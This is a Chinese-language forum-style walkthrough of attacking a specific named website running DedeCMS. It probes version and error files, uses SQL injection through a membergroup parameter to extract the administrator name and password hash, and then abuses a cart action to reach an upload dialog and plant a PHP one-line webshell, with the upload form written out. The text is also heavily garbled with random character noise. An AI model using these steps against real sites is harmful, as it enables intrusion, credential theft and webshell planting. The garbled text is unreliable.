①注入漏洞。5 l8 h3 K2 h. r' k* Z
这站 http://www.political-security.com/8 s' }7 s. V: X( J
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,1 c! o. c( t0 a; E& j1 p7 H
www.political-security.com/data/mysql_error_trace.inc 爆后台
8 c6 h. F# U/ Z/ ~然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。* O* e$ A& T* i6 U9 Z% t6 s: t, Z
然后写上语句 5 c9 }. N, y' p' k8 y# ~
查看管理员帐号
% v$ g% c) d! U. Lhttp://www.political-security.co ... &membergroup=@`: |, s" u8 O2 d, y/ ]7 K6 X
. b, x! E2 {" a/ ^2 T; f# oadmin o( ?4 M$ t* G) n r2 b
0 W8 z+ w5 E6 u H9 N0 c/ a& g/ ~
查看管理员密码3 @/ I7 K) ?4 q" _# K
http://www.political-security.co ... &membergroup=@`
% a. Y9 W) V& l5 Y( Y
. \! t$ s0 x& G8d29b1ef9f8c5a5af429
r; x* u8 G+ ^) D3 Y7 ` M7 }, {9 ~/ Y, d( d* u
查看管理员密码
O" A' }* e+ J" U
0 u/ b: ^* ?3 Y5 b7 ~$ `得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# H5 b2 B& ]$ t
9 z) L% ?. s# q. H+ K
8d2
6 R$ l' L# I. e; q( f+ a8 w9b1ef9f8c5a5af42& `' A$ x5 g, c2 C& l# ^+ F
9
, ^' }8 F9 e! R& y {' v. a) V9 y% D$ c/ h$ @: G& `( x# J* U
cmd5没解出来 只好测试第二个方法
* K. L) ?# ?3 y j4 m9 \$ K( m) }: \3 _# H& e9 M
3 i6 o* J9 W/ o9 z3 U
②上传漏洞:
1 {: o; }& {5 ]6 g. I& a; ]- s! U! i' w6 R6 t' G4 Y. N; E% @
只要登陆会员中心,然后访问页面链接! R+ \" i+ j+ t
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
4 x1 O+ i( W* j( T# |, \( M& h! W. a3 `. |( q
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”! B! d9 j( S6 C! \$ x$ h
* o o8 {3 O7 |' }& J6 d2 ]于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm% H0 v% z7 K9 u
8 H) T8 }) j- g# i& G<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>" i0 s" A! k. z3 l" K
或者/ v' m7 c- j" E5 v0 T
即可上传成功 |